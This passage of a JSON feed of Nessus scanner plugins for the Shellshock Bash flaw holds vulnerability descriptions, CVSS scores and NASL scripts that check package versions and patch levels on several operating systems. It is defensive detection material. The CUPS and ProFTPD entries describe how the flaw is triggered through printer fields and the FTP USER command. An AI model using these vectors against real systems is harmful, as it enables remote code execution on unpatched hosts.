flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.0<=4.0.39\")) flag++;\nif 
(pkg_test(save_report:TRUE, pkg:\"bash-static>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.5_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:02:46", "description": "The remote host appears to be running CUPS with the web-based interface enabled. A remote attacker can exploit CUPS to execute arbitrary commands via crafted fields during the creation or modification of a printer. The 'PRINTER_INFO' and 'PRINTER_LOCATION' fields can be configured to contain arbitrary commands which will be executed when a print job is submitted, provided the remote host is running a vulnerable version of Bash.\n\nThis plugin attempts to exploit this flaw by using user-supplied credentials to access the CUPS server and create a printer, then submitting a print request.", "cvss3": {"score": null, "vector": null}, "published": "2014-12-08T00:00:00", "type": "nessus", "title": "CUPS Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-02-14T00:00:00", "cpe": ["cpe:/a:apple:cups", "cpe:/a:gnu:bash"], "id": "CUPS_BASH_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/79804", "sourceData": "Binary data cups_bash_rce.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:49", "description": "The remote Mac OS X host has a version of Bash prior to 3.2.53(1)-release installed. 
It is, therefore, affected by a command injection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/a:gnu:bash"], "id": "MACOSX_SHELLSHOCK_UPDATE.NASL", "href": "https://www.tenable.com/plugins/nessus/77971", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77971);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution\nvulnerability, commonly referred to as Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of Bash prior to\n3.2.53(1)-release installed. 
It is, therefore, affected by a command\ninjection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could\nremotely execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT6495\");\n # https://lists.apple.com/archives/security-announce/2014/Sep/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5039c7b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1767\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1768\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1769\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[7-9]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9 / 10.8 / 10.7\");\n\nver_sh = NULL;\nver_bash = NULL;\n\npat = \"version ([0-9.]+\\([0-9]+\\))(\\-[a-z]+)?\";\n\ncmd = \"bash --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_bash_disp = item[1];\n\ncmd = \"sh --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_sh_disp = item[1];\n\nif (ver_sh_disp)\n{\n ver_sh = ereg_replace(string:ver_sh_disp, pattern:\"\\(\", replace:\".\");\n ver_sh1 = ereg_replace(string:ver_sh, pattern:\"\\)\", replace:\"\");\n}\nelse 
ver_sh1 = NULL;\nif (ver_bash_disp)\n{\n ver_bash = ereg_replace(string:ver_bash_disp, pattern:\"\\(\", replace:\".\");\n ver_bash1 = ereg_replace(string:ver_bash, pattern:\"\\)\", replace:\"\");\n}\nelse ver_bash1 = NULL;\n\nfix_disp = '3.2.53(1)';\nfix = '3.2.53.1';\n\nif (\n (!isnull(ver_sh1) && ver_compare(ver:ver_sh1, fix:fix, strict:FALSE) == -1) ||\n (!isnull(ver_bash1) && ver_compare(ver:ver_bash1, fix:fix, strict:FALSE) == -1)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + ver_bash_disp +\n '\\n Fixed version : ' + fix_disp +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'Bash', ver_bash_disp);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:51", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11514.NASL", "href": "https://www.tenable.com/plugins/nessus/77939", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11514.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77939);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80775253\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"bash-4.2.48-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:34", "description": "SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {"score": null, "vector": null}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080.NASL", "href": "https://www.tenable.com/plugins/nessus/78113", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78113);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-02\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149080-02\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-02\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be 
up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-02\", obsoleted_by:\"\", 
package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:13", "description": "SunOS 5.9: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77911", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_149079.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77911);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-01\");\n script_summary(english:\"Check for patch 149079-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149079-01\");\n script_set_attribute(attribute:\"description\", 
value:\n\"SunOS 5.9: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", 
value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78112 (solaris9_149079.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:55:56", "description": "The remote FTP server is affected by a remote code execution vulnerability due to an error in the Bash shell running on the remote host. A remote, unauthenticated attacker can execute arbitrary code on the remote host by sending a specially crafted request via the USER FTP command. 
The 'mod_exec' module exports the attacker-supplied username as an environment variable, which is then evaluated by Bash as code.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:gnu:bash", "cpe:/a:proftpd:proftpd"], "id": "PROFTPD_BASH_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/77986", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77986);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FTP server is affected by a remote code execution\nvulnerability due to an error in the Bash shell running on the remote\nhost. A remote, unauthenticated attacker can execute arbitrary code on\nthe remote host by sending a specially crafted request via the USER\nFTP command. 
The 'mod_exec' module exports the attacker-supplied\nusername as an environment variable, which is then evaluated by Bash\nas code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.proftpd.org/docs/contrib/mod_exec.html#ExecEnviron\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:proftpd:proftpd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_starttls.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ftp\", 21);\n script_timeout(600);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"kerberos_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"telnet2_func.inc\");\n\nport = get_ftp_port(default:21);\nif (supplied_logins_only) 